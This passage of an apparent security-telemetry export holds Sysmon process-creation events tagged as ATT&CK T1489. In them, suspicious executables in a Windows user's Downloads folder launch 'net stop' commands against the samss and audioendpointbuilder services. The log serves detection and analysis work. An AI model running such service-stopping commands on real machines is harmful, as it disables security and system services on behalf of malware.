\\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:46:31.684",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:30.589 +ProcessGuid: {df9fc3d3-1b26-5ec9-0000-001019bb2500} +ProcessId: 247320 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500} +ParentProcessId: 246560 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:30.602147300Z"",""eventRecordID"":""1722"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:30.589\r\nProcessGuid: {df9fc3d3-1b26-5ec9-0000-001019bb2500}\r\nProcessId: 247320\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500}\r\nParentProcessId: 246560\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:30.589"",""processGuid"":""{df9fc3d3-1b26-5ec9-0000-001019bb2500}"",""processId"":""247320"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b26-5ec9-0000-0010a8a72500}"",""parentProcessId"":""246560"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:31.669",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:30.221 +ProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500} +ProcessId: 246560 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:30.247574300Z"",""eventRecordID"":""1721"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:30.221\r\nProcessGuid: {df9fc3d3-1b26-5ec9-0000-0010a8a72500}\r\nProcessId: 246560\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:30.221"",""processGuid"":""{df9fc3d3-1b26-5ec9-0000-0010a8a72500}"",""processId"":""246560"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:31.653",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:30.212 +ProcessGuid: {df9fc3d3-1b26-5ec9-0000-001026a72500} +ProcessId: 246552 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500} +ParentProcessId: 246028 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:30.244724000Z"",""eventRecordID"":""1720"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:30.212\r\nProcessGuid: {df9fc3d3-1b26-5ec9-0000-001026a72500}\r\nProcessId: 246552\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500}\r\nParentProcessId: 246028\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:30.212"",""processGuid"":""{df9fc3d3-1b26-5ec9-0000-001026a72500}"",""processId"":""246552"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b25-5ec9-0000-001054922500}"",""parentProcessId"":""246028"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:31.640",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:29.830 +ProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500} +ProcessId: 246028 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:29.861731900Z"",""eventRecordID"":""1719"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:29.830\r\nProcessGuid: {df9fc3d3-1b25-5ec9-0000-001054922500}\r\nProcessId: 246028\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:29.830"",""processGuid"":""{df9fc3d3-1b25-5ec9-0000-001054922500}"",""processId"":""246028"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:04.341",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:02.602 +ProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010dc5f2100} +ProcessId: 211924 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100} +ParentProcessId: 3320 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:02.644967200Z"",""eventRecordID"":""1717"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:02.602\r\nProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010dc5f2100}\r\nProcessId: 211924\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100}\r\nParentProcessId: 3320\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:02.602"",""processGuid"":""{df9fc3d3-1b0a-5ec9-0000-0010dc5f2100}"",""processId"":""211924"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b09-5ec9-0000-001030572100}"",""parentProcessId"":""3320"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:03.411",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:02.582 +ProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010ac5e2100} +ProcessId: 211928 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100} +ParentProcessId: 3920 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:02.599019000Z"",""eventRecordID"":""1716"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:02.582\r\nProcessGuid: {df9fc3d3-1b0a-5ec9-0000-0010ac5e2100}\r\nProcessId: 211928\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b09-5ec9-0000-001046522100}\r\nParentProcessId: 3920\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:02.582"",""processGuid"":""{df9fc3d3-1b0a-5ec9-0000-0010ac5e2100}"",""processId"":""211928"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b09-5ec9-0000-001046522100}"",""parentProcessId"":""3920"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:46:03.388",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:01.912 +ProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100} +ProcessId: 3320 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:02.070058900Z"",""eventRecordID"":""1715"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:01.912\r\nProcessGuid: {df9fc3d3-1b09-5ec9-0000-001030572100}\r\nProcessId: 3320\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 